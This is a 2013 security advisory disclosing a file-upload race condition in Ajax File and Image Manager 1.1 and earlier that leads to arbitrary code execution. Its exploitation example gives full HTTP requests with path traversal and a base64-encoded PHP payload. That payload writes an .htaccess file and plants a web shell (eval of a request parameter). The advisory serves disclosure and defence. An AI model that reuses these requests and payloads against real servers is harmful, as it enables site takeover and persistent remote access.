(PT-2013-41) Positive Technologies Security Advisory
Arbitrary Code Execution in Ajax File and Image Manager
Vulnerable software
Ajax File and Image Manager
Version: 1.1 and earlier
Link:
http://www.phpletter.com/DOWNLOAD/
Severity level
Severity level: High
Impact: Arbitrary Code Execution
Access Vector: Remote
CVSS v2:
Base Score: 10
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE: not assigned
Software description
Ajax file and Image Manager is an open source file manager, which employs Ajax and PHP. It can be used as a standalone web application, as well as the TinyMCE/FCKeditor plugin.
Vulnerability description
The specialists of the Positive Research center have detected "Arbitrary Code Execution" vulnerability in Ajax File and Image Manager.
Due to incorrect application architecture, validation of file extension is implemented after uploading file. Uploaded file will subsequently be removed if its extension is not allowed by whitelist. Thus, you can refer to the uploaded file before its removal, resulting in arbitrary code execution.
Vulnerability exploitation example:
Send the following requests simultaneously:
1)
POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1
Host: localhost
User-Agent: google/agent
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------307211690811
Content-Length: 613-----------------------------307211690811
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg<?php
2)
eval(base64_decode("JGZwID0gZm9wZW4oIi5odGFjY2VzcyIsICJ3Iik7CiRodGFjY2VzcyA9ICc8RmlsZXNNYXRjaCAi
LihwaHApJCI+CkFsbG93IGZyb20gYWxsCjwvRmlsZXNtYXRjaD4nOwokdGVzdCA9IGZ3cml0ZSgk
ZnAsICRodGFjY2Vzcyk7CmZjbG9zZSgkZnApOwojaWYoZmlsZV9leGlzdHMoIjIucGhwIikpIHtk
aWUoKTt9CiRmcDEgPSBmb3BlbigiMi5waHAiLCAidyIpOwokY29kZSA9ICc8P3BocCBldmFsKCRf
UkVRVUVTVFtjXSk7ID8+JzsKJHRlc3QgPSBmd3JpdGUoJGZwMSwgJGNvZGUpOwpmY2xvc2UoJGZw
MSk7"));
?>
-----------------------------307211690811—
POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1
Host: localhost
User-Agent: google/agent
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------307211690811
Content-Length: 240-----------------------------307211690811
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg<FilesMatch ".(php)$">
3)
Allow from all
</FilesMatch>
-----------------------------307211690811—
GET /targethost/images/banner/1.php HTTP/1.1
Host: localhost
Connection: keep-alive
This will also create the following files in the /targethost/images/banner directory:
.htaccess with
<FilesMatch ".(php)$">
Allow from all
</Filesmatch>
and 2.php with
<?php eval($_REQUEST[c]); ?>.
How to fix
No solution
Advisory status
20.06.2013 - Vendor gets vulnerability details
04.09.2013 - Vulnerability details were sent to CERT
17.09.2013 - Public disclosure
Credits
The vulnerability was detected by Ilya Krupenko, Positive Research Center (Positive Technologies Company)
References
http://en.securitylab.ru/lab/PT-2013-41
Reports on the vulnerabilities previously discovered by Positive Research:
http://www.ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/
About Positive Technologies
Positive Technologies www.ptsecurity.com is among the key players in the IT security market in Russia.
The principal activities of the company include the development of integrated tools for information security monitoring (MaxPatrol); providing IT security consulting services and technical support; development of the Securitylab leading Russian information security portal.
Among the clients of Positive Technologies, there are more than 40 state enterprises, more than 50 banks and financial organizations, 20 telecommunication companies, more than 40 plant facilities, as well as IT, service and retail companies from Russia, the CIS countries, the Baltic States, China, Ecuador, Germany, Great Britain, Holland, Iran, Israel, Japan, Mexico, the Republic of South Africa, Thailand, Turkey, and the USA.
Positive Technologies is a team of highly skilled developers, advisers and experts with years of vast hands-on experience. The company specialists possess professional titles and certificates; they are the members of various international societies and are actively involved in the IT security field development.
Get in touch
will contact you shortly